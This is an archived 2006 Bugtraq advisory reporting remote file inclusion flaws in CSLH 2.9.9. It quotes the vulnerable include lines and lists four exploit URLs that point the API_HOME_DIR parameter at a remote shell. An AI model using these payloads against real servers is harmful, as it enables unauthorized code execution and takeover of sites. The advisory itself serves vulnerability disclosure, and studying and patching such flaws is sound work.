Home page logo
/

bugtraq logo Bugtraq mailing list archives

CSLH2.9.9 Remote File Include Vulnerabilities
From: crackers_child () sibersavascilar com
Date: 24 Oct 2006 15:33:40 -0000

#########################################################
CSLH2.9.9  Remote File Include Vulnerabilities
 
#########################################################

By Crackers_Child

crackers_child () sibersavascilar com

www.sibersavacilar.com

#########################################################

Download Script

http://craftysyntax.com/CSLH2.9.9.zip


#########################################################

#########################################################
Bug 

include_once(API_HOME_DIR . "util.php");
include_once(API_HOME_DIR . "const.php");
include_once(API_HOME_DIR . "stringparser.php");

#########################################################
Exploit
#########################################################

www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?

www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?

www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?

www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?

#########################################################

Greetz:All My Friends !

#########################################################


  By Date           By Thread  

Current thread:
  • CSLH2.9.9 Remote File Include Vulnerabilities crackers_child (Oct 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault